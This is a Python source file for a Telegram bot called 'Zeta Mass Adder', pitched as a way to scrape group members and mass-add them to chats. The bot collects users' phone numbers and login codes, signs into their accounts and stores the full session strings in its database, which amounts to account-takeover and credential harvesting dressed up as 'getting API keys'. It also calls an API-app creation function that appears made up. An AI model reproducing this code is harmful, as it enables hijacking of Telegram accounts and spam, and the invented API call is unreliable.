import os
import logging
import asyncio
import asyncpg
from datetime import datetime
from telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import Application, CommandHandler, CallbackQueryHandler, MessageHandler, filters, ContextTypes
from telethon import TelegramClient
from telethon.sessions import StringSession
from telethon.tl import functions

# Настройка логирования
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

# Глобальные переменные
user_states = {}
user_data = {}

# PostgreSQL подключение
DATABASE_URL = os.environ.get('DATABASE_URL')

async def create_pool():
    return await asyncpg.create_pool(DATABASE_URL)

async def init_database():
    """Инициализация PostgreSQL таблиц"""
    try:
        pool = await create_pool()
        async with pool.acquire() as conn:
            await conn.execute('''
                CREATE TABLE IF NOT EXISTS users (
                    user_id BIGINT PRIMARY KEY,
                    phone TEXT,
                    api_id INTEGER,
                    api_hash TEXT,
                    session_string TEXT,
                    is_active BOOLEAN DEFAULT TRUE,
                    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
                    last_activity TIMESTAMP DEFAULT CURRENT_TIMESTAMP
                )
            ''')
            
            await conn.execute('''
                CREATE TABLE IF NOT EXISTS auth_sessions (
                    user_id BIGINT PRIMARY KEY,
                    phone TEXT,
                    phone_code_hash TEXT,
                    client_data TEXT,
                    state TEXT,
                    created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
                )
            ''')
            
            await conn.execute('''
                CREATE TABLE IF NOT EXISTS user_stats (
                    user_id BIGINT PRIMARY KEY,
                    scans_count INTEGER DEFAULT 0,
                    adds_count INTEGER DEFAULT 0,
                    total_added INTEGER DEFAULT 0,
                    last_scan TIMESTAMP,
                    last_add TIMESTAMP
                )
            ''')
        await pool.close()
        print("✅ База данных инициализирована")
        return True
    except Exception as e:
        print(f"❌ Ошибка инициализации БД: {e}")
        return False

class MassAuthSystem:
    def __init__(self):
        self.temp_clients = {}
        
    async def start_auth(self, user_id, phone_number):
        """Начинаем процесс авторизации для пользователя"""
        try:
            client = TelegramClient(
                StringSession(), 
                api_id=2040,
                api_hash='b18441a1ff607e10a989891a5462e627'
            )
            
            await client.connect()
            sent_code = await client.send_code_request(phone_number)
            
            await self.save_auth_session(
                user_id, 
                phone_number, 
                sent_code.phone_code_hash,
                client.session.save(),
                'waiting_code'
            )
            
            self.temp_clients[user_id] = client
            
            return {
                'success': True, 
                'message': f"✅ Код отправлен на {phone_number}",
                'phone_code_hash': sent_code.phone_code_hash
            }
            
        except Exception as e:
            logger.error(f"Ошибка отправки кода: {e}")
            return {'success': False, 'message': f"❌ Ошибка: {str(e)}"}
    
    async def verify_code(self, user_id, code):
        """Проверяем код и получаем API ключи"""
        try:
            auth_data = await self.get_auth_session(user_id)
            if not auth_data:
                return {'success': False, 'message': '❌ Сессия не найдена'}
            
            client = TelegramClient(
                StringSession(auth_data['client_data']),
                api_id=2040,
                api_hash='b18441a1ff607e10a989891a5462e627'
            )
            
            await client.connect()
            await client.sign_in(
                phone=auth_data['phone'],
                code=code,
                phone_code_hash=auth_data['phone_code_hash']
            )
            
            app = await client(functions.account.CreateAppRequest(
                app_id=2040,
                app_hash='b18441a1ff607e10a989891a5462e627',
                app_title=f"MassAdder_User_{user_id}",
                app_shortname=f"user_{user_id}",
                app_url="",
                platform="desktop",
                description="Auto-generated by Zeta Mass Adder Bot"
            ))
            
            await self.save_user_api(
                user_id, 
                auth_data['phone'],
                app.api_id, 
                app.api_hash,
                client.session.save()
            )
            
            await self.cleanup_auth_session(user_id)
            if user_id in self.temp_clients:
                await self.temp_clients[user_id].disconnect()
                del self.temp_clients[user_id]
            
            await client.disconnect()
            
            return {
                'success': True,
                'api_id': app.api_id,
                'api_hash': app.api_hash,
                'message': '🎉 Авторизация успешна! API ключи получены.'
            }
            
        except Exception as e:
            logger.error(f"Ошибка верификации кода: {e}")
            return {'success': False, 'message': f'❌ Ошибка: {str(e)}'}

    async def save_auth_session(self, user_id, phone, phone_code_hash, client_data, state):
        """Сохраняем сессию авторизации"""
        try:
            pool = await create_pool()
            async with pool.acquire() as conn:
                await conn.execute('''
                    INSERT INTO auth_sessions 
                    (user_id, phone, phone_code_hash, client_data, state) 
                    VALUES ($1, $2, $3, $4, $5)
                    ON CONFLICT (user_id) 
                    DO UPDATE SET 
                        phone = $2,
                        phone_code_hash = $3,
                        client_data = $4,
                        state = $5,
                        created_at = CURRENT_TIMESTAMP
                ''', user_id, phone, phone_code_hash, client_data, state)
            await pool.close()
        except Exception as e:
            logger.error(f"Ошибка сохранения сессии: {e}")

    async def get_auth_session(self, user_id):
        """Получаем сессию авторизации"""
        try:
            pool = await create_pool()
            async with pool.acquire() as conn:
                row = await conn.fetchrow('SELECT * FROM auth_sessions WHERE user_id = $1', user_id)
            await pool.close()
            
            if row:
                return {
                    'user_id': row['user_id'],
                    'phone': row['phone'],
                    'phone_code_hash': row['phone_code_hash'],
                    'client_data': row['client_data'],
                    'state': row['state']
                }
            return None
        except Exception as e:
            logger.error(f"Ошибка получения сессии: {e}")
            return None

    async def cleanup_auth_session(self, user_id):
        """Очищаем сессию авторизации"""
        try:
            pool = await create_pool()
            async with pool.acquire() as conn:
                await conn.execute('DELETE FROM auth_sessions WHERE user_id = $1', user_id)
            await pool.close()
        except Exception as e:
            logger.error(f"Ошибка очистки сессии: {e}")

    async def save_user_api(self, user_id, phone, api_id, api_hash, session_string):
        """Сохраняем API ключи пользователя"""
        try:
            pool = await create_pool()
            async with pool.acquire() as conn:
                await conn.execute('''
                    INSERT INTO users 
                    (user_id, phone, api_id, api_hash, session_string, last_activity) 
                    VALUES ($1, $2, $3, $4, $5, $6)
                    ON CONFLICT (user_id) 
                    DO UPDATE SET 
                        phone = $2,
                        api_id = $3,
                        api_hash = $4,
                        session_string = $5,
                        last_activity = $6
                ''', user_id, phone, api_id, api_hash, session_string, datetime.now())
            await pool.close()
        except Exception as e:
            logger.error(f"Ошибка сохранения API: {e}")

mass_auth = MassAuthSystem()

async def get_user_data(user_id):
    """Получаем данные пользователя"""
    try:
        pool = await create_pool()
        async with pool.acquire() as conn:
            row = await conn.fetchrow('SELECT * FROM users WHERE user_id = $1', user_id)
        await pool.close()
        
        if row:
            return {
                'user_id': row['user_id'],
                'phone': row['phone'],
                'api_id': row['api_id'],
                'api_hash': row['api_hash'],
                'session_string': row['session_string'],
                'is_active': row['is_active']
            }
        return None
    except Exception as e:
        logger.error(f"Ошибка получения данных пользователя: {e}")
        return None

async def get_user_stats(user_id):
    """Получаем статистику пользователя"""
    try:
        pool = await create_pool()
        async with pool.acquire() as conn:
            row = await conn.fetchrow('SELECT * FROM user_stats WHERE user_id = $1', user_id)
        await pool.close()
        
        if row:
            return {
                'scans_count': row['scans_count'],
                'adds_count': row['adds_count'],
                'total_added': row['total_added']
            }
        return {'scans_count': 0, 'adds_count': 0, 'total_added': 0}
    except Exception as e:
        logger.error(f"Ошибка получения статистики: {e}")
        return {'scans_count': 0, 'adds_count': 0, 'total_added': 0}

async def update_user_stats(user_id, field):
    """Обновляем статистику пользователя"""
    try:
        pool = await create_pool()
        async with pool.acquire() as conn:
            if field == 'scans_count':
                await conn.execute('''
                    INSERT INTO user_stats (user_id, scans_count, last_scan)
                    VALUES ($1, 1, $2)
                    ON CONFLICT (user_id) 
                    DO UPDATE SET 
                        scans_count = user_stats.scans_count + 1,
                        last_scan = $2
                ''', user_id, datetime.now())
            elif field == 'adds_count':
                await conn.execute('''
                    INSERT INTO user_stats (user_id, adds_count, last_add)
                    VALUES ($1, 1, $2)
                    ON CONFLICT (user_id) 
                    DO UPDATE SET 
                        adds_count = user_stats.adds_count + 1,
                        last_add = $2
                ''', user_id, datetime.now())
        await pool.close()
    except Exception as e:
        logger.error(f"Ошибка обновления статистики: {e}")

# Обработчики команд для python-telegram-bot
async def start(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Обработчик команды /start"""
    user_id = update.effective_user.id
    user_data_obj = await get_user_data(user_id)
    
    keyboard = [
        [InlineKeyboardButton("🔐 Быстрая авторизация", callback_data="quick_auth")],
        [InlineKeyboardButton("📖 Инструкция", callback_data="manual_guide")],
        [InlineKeyboardButton("💬 Поддержка", url="https://t.me/zeta_support")]
    ]
    reply_markup = InlineKeyboardMarkup(keyboard)
    
    if user_data_obj and user_data_obj.get('api_id'):
        stats = await get_user_stats(user_id)
        await update.message.reply_text(
            f"🤖 **Главное меню**\n\n"
            f"✅ Авторизован: `{user_data_obj['phone']}`\n"
            f"📊 Сканирований: `{stats.get('scans_count', 0)}`\n"
            f"👥 Добавлено: `{stats.get('total_added', 0)}`\n\n"
            f"Выбери действие:",
            reply_markup=reply_markup,
            parse_mode='Markdown'
        )
    else:
        await update.message.reply_text(
            "👋 **Добро пожаловать в Zeta Mass Adder!**\n\n"
            "🤖 *Умный бот для роста Telegram-сообществ*\n\n"
            "🎯 **Для начала работы:**\n"
            "1. 🔐 Авторизуйся через номер телефона\n"
            "2. 🔍 Выбери чат для сканирования\n"
            "3. 🚀 Добавь пользователей в свою группу\n\n"
            "⚡ **Бот автоматически получит твои API ключи!**",
            reply_markup=reply_markup,
            parse_mode='Markdown'
        )

async def button_handler(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Обработчик нажатий на кнопки"""
    query = update.callback_query
    await query.answer()
    
    user_id = query.from_user.id
    logger.info(f"Обрабатываю callback: {query.data} от пользователя {user_id}")
    
    try:
        if query.data == "quick_auth":
            await query.edit_message_text(
                "🔐 **Быстрая авторизация**\n\n"
                "📱 Отправь мне свой номер телефона в международном формате:\n\n"
                "**Пример:** `+79123456789`\n\n"
                "⚠️ *Используй только свой номер телефона*",
                parse_mode='Markdown'
            )
            user_states[user_id] = 'waiting_phone'
        
        elif query.data == "manual_guide":
            await query.edit_message_text(
                "📖 **Инструкция по использованию**\n\n"
                "1. **Авторизация:** Отправь номер телефона для получения API ключей\n"
                "2. **Сканирование:** Укажи чат для поиска пользователей\n"
                "3. **Добавление:** Выбери целевую группу для добавления\n\n"
                "⚡ Все процессы автоматизированы!",
                parse_mode='Markdown'
            )
        
        elif query.data == "scan_chat":
            await query.edit_message_text(
                "🔍 **Сканирование чата**\n\n"
                "Функция в разработке...\n\n"
                "Скоро здесь можно будет сканировать чаты для поиска пользователей!",
                parse_mode='Markdown'
            )
        
        elif query.data == "add_users":
            await query.edit_message_text(
                "🚀 **Добавление пользователей**\n\n"
                "Функция в разработке...\n\n"
                "Скоро здесь можно будет массово добавлять пользователей в группы!",
                parse_mode='Markdown'
            )
        
        elif query.data == "stats":
            user_id = query.from_user.id
            stats = await get_user_stats(user_id)
            await query.edit_message_text(
                f"📊 **Твоя статистика**\n\n"
                f"🔍 Сканирований: **{stats['scans_count']}**\n"
                f"🚀 Операций добавления: **{stats['adds_count']}**\n"
                f"👥 Всего добавлено: **{stats['total_added']}**\n\n"
                f"⚡ Продолжаем в том же духе!",
                parse_mode='Markdown'
            )
        
        elif query.data == "main_menu":
            user_data_obj = await get_user_data(user_id)
            if user_data_obj and user_data_obj.get('api_id'):
                stats = await get_user_stats(user_id)
                keyboard = [
                    [InlineKeyboardButton("🔍 Сканировать чат", callback_data="scan_chat"),
                     InlineKeyboardButton("🚀 Добавить", callback_data="add_users")],
                    [InlineKeyboardButton("📊 Статистика", callback_data="stats"),
                     InlineKeyboardButton("⚙️ Настройки", callback_data="settings")],
                    [InlineKeyboardButton("🆘 Помощь", callback_data="help"),
                     InlineKeyboardButton("🔄 Переавторизация", callback_data="reauth")]
                ]
                reply_markup = InlineKeyboardMarkup(keyboard)
                
                await query.edit_message_text(
                    f"🤖 **Главное меню**\n\n"
                    f"✅ Авторизован: `{user_data_obj['phone']}`\n"
                    f"📊 Сканирований: `{stats.get('scans_count', 0)}`\n"
                    f"👥 Добавлено: `{stats.get('total_added', 0)}`\n\n"
                    f"Выбери действие:",
                    reply_markup=reply_markup,
                    parse_mode='Markdown'
                )
            else:
                keyboard = [
                    [InlineKeyboardButton("🔐 Быстрая авторизация", callback_data="quick_auth")],
                    [InlineKeyboardButton("📖 Инструкция", callback_data="manual_guide")],
                    [InlineKeyboardButton("💬 Поддержка", url="https://t.me/zeta_support")]
                ]
                reply_markup = InlineKeyboardMarkup(keyboard)
                
                await query.edit_message_text(
                    "👋 **Добро пожаловать в Zeta Mass Adder!**\n\n"
                    "🤖 *Умный бот для роста Telegram-сообществ*\n\n"
                    "🎯 **Для начала работы:**\n"
                    "1. 🔐 Авторизуйся через номер телефона\n"
                    "2. 🔍 Выбери чат для сканирования\n"
                    "3. 🚀 Добавь пользователей в свою группу\n\n"
                    "⚡ **Бот автоматически получит твои API ключи!**",
                    reply_markup=reply_markup,
                    parse_mode='Markdown'
                )
        
        elif query.data == "settings":
            await query.edit_message_text(
                "⚙️ **Настройки**\n\n"
                "🔧 *Раздел в разработке*\n\n"
                "Скоро здесь можно будет настроить:\n"
                "• Лимиты сканирования\n"
                "• Лимиты добавления\n"
                "• Задержки между действиями\n"
                "• Автоматизацию процессов",
                parse_mode='Markdown'
            )
        
        elif query.data == "help":
            await query.edit_message_text(
                "🆘 **Помощь по боту Zeta Mass Adder**\n\n"
                "🔐 **Авторизация:**\n"
                "• Используй быструю авторизацию через номер телефона\n"
                "• Бот автоматически получит твои API ключи\n"
                "• Все данные хранятся безопасно\n\n"
                "🔍 **Сканирование чатов:**\n"
                "• Отправь ссылку на любой чат/канал\n"
                "• Бот найдет пользователей которых можно добавить\n"
                "• Настраивай лимиты сканирования\n\n"
                "🚀 **Добавление пользователей:**\n"
                "• Выбери целевую группу\n"
                "• Бот массово добавит найденных пользователей\n"
                "• Автоматическая задержка между добавлениями\n\n"
                "💬 **Поддержка:**\n"
                "@zeta_support - помощь и вопросы",
                parse_mode='Markdown'
            )
        
        elif query.data == "reauth":
            # Удаляем старые данные
            pool = await create_pool()
            async with pool.acquire() as conn:
                await conn.execute('DELETE FROM users WHERE user_id = $1', user_id)
                await conn.execute('DELETE FROM auth_sessions WHERE user_id = $1', user_id)
                await conn.execute('DELETE FROM user_stats WHERE user_id = $1', user_id)
            await pool.close()
            
            user_states.pop(user_id, None)
            user_data.pop(user_id, None)
            
            await query.edit_message_text(
                "🔄 **Все данные удалены!**\n\n"
                "Теперь можешь пройти авторизацию заново через /start\n\n"
                "⚡ *Бот сгенерирует для тебя новые API ключи*",
                parse_mode='Markdown'
            )
    
    except Exception as e:
        logger.error(f"Ошибка в обработчике кнопок: {e}")
        await query.edit_message_text(
            "❌ Произошла ошибка при обработке запроса. Попробуйте еще раз.",
            parse_mode='Markdown'
        )

async def handle_message(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Обработчик текстовых сообщений"""
    user_id = update.effective_user.id
    state = user_states.get(user_id)
    text = update.message.text
    
    if not state:
        # Если нет состояния, просто игнорируем
        return
        
    if state == 'waiting_phone':
        # Проверяем формат номера
        if not text.startswith('+') or len(text) < 10:
            await update.message.reply_text(
                "❌ **Неправильный формат номера!**\n\n"
                "📱 **Правильный формат:** `+79123456789`\n"
                "Попробуй еще раз:",
                parse_mode='Markdown'
            )
            return
            
        # Начинаем процесс авторизации
        result = await mass_auth.start_auth(user_id, text)
        
        if result['success']:
            user_states[user_id] = 'waiting_code'
            await update.message.reply_text(
                f"✅ {result['message']}\n\n"
                f"📲 *Telegram прислал код подтверждения*\n"
                f"🔢 Отправь его мне в формате: `12345`",
                parse_mode='Markdown'
            )
        else:
            await update.message.reply_text(result['message'])
            user_states.pop(user_id, None)
            
    elif state == 'waiting_code':
        # Проверяем формат кода
        if not text.isdigit() or len(text) != 5:
            await update.message.reply_text("❌ Код должен быть 5 цифр! Пример: `12345`", parse_mode='Markdown')
            return
            
        # Проверяем код и получаем API ключи
        result = await mass_auth.verify_code(user_id, text)
        
        if result['success']:
            keyboard = [
                [InlineKeyboardButton("🔍 Сканировать чат", callback_data="scan_chat")],
                [InlineKeyboardButton("🚀 Добавить пользователей", callback_data="add_users")],
                [InlineKeyboardButton("📊 Статистика", callback_data="stats")],
                [InlineKeyboardButton("🏠 Главное меню", callback_data="main_menu")]
            ]
            reply_markup = InlineKeyboardMarkup(keyboard)
            
            await update.message.reply_text(
                f"🎉 **{result['message']}**\n\n"
                f"🔑 **Твои уникальные API ключи:**\n"
                f"• API_ID: `{result['api_id']}`\n"
                f"• API_HASH: `{result['api_hash']}`\n\n"
                f"⚡ Теперь можно начинать работу!",
                reply_markup=reply_markup,
                parse_mode='Markdown'
            )
        else:
            await update.message.reply_text(result['message'])
            
        user_states.pop(user_id, None)

async def error_handler(update: Update, context: ContextTypes.DEFAULT_TYPE):
    """Обработчик ошибок"""
    logger.error(f"Ошибка: {context.error}")

async def main():
    """Основная асинхронная функция запуска бота"""
    # Получаем токен бота из переменных окружения
    BOT_TOKEN = os.environ.get("BOT_TOKEN")
    
    if not BOT_TOKEN:
        raise ValueError("❌ BOT_TOKEN не установлен в переменных окружения!")
    
    # Инициализируем базу данных
    print("🚀 Инициализация Zeta Mass Adder Bot...")
    db_success = await init_database()
    
    if not db_success:
        print("❌ Не удалось инициализировать базу данных")
        return
    
    # Создаем приложение
    application = Application.builder().token(BOT_TOKEN).build()
    
    # Добавляем обработчики в ПРАВИЛЬНОМ порядке
    application.add_handler(CommandHandler("start", start))
    application.add_handler(CallbackQueryHandler(button_handler))
    application.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_message))
    application.add_error_handler(error_handler)
    
    # Запускаем бота
    print("🤖 Запускаю бота...")
    
    try:
        await application.initialize()
        await application.start()
        await application.updater.start_polling()
        
        me = await application.bot.get_me()
        print(f"✅ Бот @{me.username} успешно запущен!")
        print("⚡ Бот работает и ожидает сообщения...")
        
        # Бесконечный цикл
        while True:
            await asyncio.sleep(3600)  # Спим 1 час
            
    except Exception as e:
        logger.error(f"Ошибка запуска бота: {e}")
    finally:
        # Корректное завершение
        if application.updater:
            await application.updater.stop()
        await application.stop()
        await application.shutdown()

if __name__ == "__main__":
    # Запускаем асинхронную main функцию
    asyncio.run(main())
